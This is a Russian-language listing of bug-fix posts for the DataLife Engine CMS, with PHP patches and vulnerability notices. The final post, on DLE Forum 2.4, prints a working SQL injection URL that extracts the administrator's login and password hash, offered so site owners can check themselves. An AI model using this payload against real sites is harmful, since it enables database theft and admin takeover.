loading...

Авторизация ...

Имя пользователя :
Пароль :
я всё забыл!

Баг-фиксыДвойное экранирование кавычек в rss-импорте

В engine/inc/rss.php найти
$title = $db->safesql( $parse->process( $title ) );

заменить на
$title = $db->safesql( $title );


На безопасность движка это никак не повлияет, т.к. выше по коду заголовок уже прогоняется через парсер:
$title = $parse->process( $content['title'] );
  Написал pleomax 4 июля 2011, оставили 0 комментариев просмотрели 6764 раз | рейтинг новости уменьшить   +1   Увеличить

Баг-фиксыНепрозрачный фон watermark-а у картинок формата png-8

Проблема: В DLE watermark в формате png-24, потому что там прозрачный фон. Вот при наложении png-24 на png-8 этот фон не остается прозрачным а заливается цветом.

Ошибка в версии: Все версии
  Написал Sander1 16 мая 2011, оставили 5 комментариев просмотрели 9318 раз | рейтинг новости уменьшить   +18   Увеличить

Баг-фиксыПредотвращение заливки шелла v2 (php версия)

Предложенный вариант мне показался глупым, так как шелл могут залить не только в папку /uploads/ и /templates/.
Поэтому юзаем следующий код
  Написал pro10026 26 октября 2010, оставили 5 комментариев просмотрели 10834 раз | рейтинг новости уменьшить   -3   Увеличить

Баг-фиксыЧастичное закрытие неизвестных уязвимостей в DLE

Частичное закрытие неизвестных уязвимостей в DLE



В этой небольшой статье мы хотим рассказать вам о том как, как вам можно повысить безопасность вашего сайта. Как известно наибольшую угрозу для сайта представляют собой залитые злоумышленником на сервер PHP шеллы. Что это такое? Это PHP скрипты которые могут выполняться на вашем сервере, соответственно производить какие-либо изменения в файлах доступных для записи или могут, например читать содержимое конфигурационных данных и соответственно получать прямой доступ к базе данных. Каким образом могут попадать данные шеллы на ваш сервер?
  Написал AVET 23 октября 2010, оставили 20 комментариев просмотрели 13112 раз | рейтинг новости уменьшить   +13   Увеличить

Баг-фиксыФикс количества новостей в день

Баг версии : 9.0

В настройках групп пользователей
Укажите максимальное количество новостей в день, которое пользователь может добавлять на сайте. Для отключения лимита новостей укажите 0.


Но данный лимит выдаётся на всю группу пользователей.
  Написал keiZ 23 октября 2010, оставили 8 комментариев просмотрели 6689 раз | рейтинг новости уменьшить   0   Увеличить

Баг-фиксы(DLE 9.0) Ошибка в preview.php

Описание проблемы:
Если вы используете шаблон preview.tpl и для вывода текста полной новости используете только тег {full-story}, то при отсутствии текста полной новости краткая новость не бдует дублироваться при предпросмотре, как это было в более старых версиях.

Решение проблемы:
1. Открыть файл engine/preview.php, найти строки:
if( strlen( $full_story ) < 13 AND strpos( $tpl->copy_template, "{short-story}" ) === false ) {
    $full_story = $short_story;
}

Заменить на:
$fullprevtpl = preg_replace( "'.*\[full-preview\](.*?)\[/full-preview\].*'si", "\\1", $tpl->copy_template );
if( strlen( $full_story ) < 13 AND strpos( $fullprevtpl, "{short-story}" ) === false ) {
    $full_story = $short_story;
}


2. Открыть файл inc/preview.php, найдити строку:
    if( strlen( $full_story ) < 13 AND strpos( $tpl->copy_template, "{short-story}" ) === false ) { $full_story = $short_story; }

Заменить на:
    $fullprevtpl = preg_replace( "'.*\[full-preview\](.*?)\[/full-preview\].*'si", "\\1", $tpl->copy_template );
    if( strlen( $full_story ) < 13 AND strpos( $fullprevtpl, "{short-story}" ) === false ) { $full_story = $short_story; }


PS: Не знаю - может не баг, а фича, но в старых версиях при отсутствии полного текста показывался краткий текст. А пользователи видят, что "полное содержимое" не отображается и дублируют текст.
  Написал m1kola 18 октября 2010, оставили 5 комментариев просмотрели 8522 раз | рейтинг новости уменьшить   +1   Увеличить

Баг-фиксы(DLE 9.0; IE6, 7) Решение проблемы с редактором в админке

В версии DLE 9.0 имеется проблема с редактором в админке. Из-за лишней пары запятых в JS коде не работал весь редактор BB кодов в IE6 и IE7.
  Написал m1kola 29 сентября 2010, оставили 16 комментариев просмотрели 9983 раз | рейтинг новости уменьшить   +3   Увеличить

Баг-фиксыНедостаточная фильтрация входящих данных

Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: Все версии

Степень опасности: Высокая
  Написал sanshteyn 14 сентября 2010, оставили 11 комментариев просмотрели 9823 раз | рейтинг новости уменьшить   +9   Увеличить

Баг-фиксыУязвимость в dle версиях х.х - 8.2

Проблема: Недостаточная фильтрация входящих данных при обработке cookies.

Ошибка в версии: х.х - 8.2

Степень опасности: Средняя
  Написал Sander1 13 сентября 2010, оставили 4 комментария просмотрели 8141 раз | рейтинг новости уменьшить   0   Увеличить

Баг-фиксыКритическая уязвимость в dle-forum

В DLE Forum 2.4 обнаружена уязвимость, которая позволяет злоумышленникам выполнять запросы в бд, и узнавать любую информацию и в последствии получать доступ к сайту.

Критичность: высокая
Версия форума: DLE Forum 2.4

У кого стоит данная версия форума, рекомендуется проверить на уязвимость:

ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1-- ,


Если Ваш сайт уязвим, то в заголовке страницы будет отображен логин, и хеш пароля (далее объяснять не буду, специалисты поймут!).
Уязвимость находится в скрипте engine/forum/sources/components/init.php в 446 строке!
  Написал kandasoft 15 июня 2010, оставили 11 комментариев просмотрели 11378 раз | рейтинг новости уменьшить   +1   Увеличить

[removed][removed] [removed] (adsbygoogle = window.adsbygoogle || []).push({}); [removed]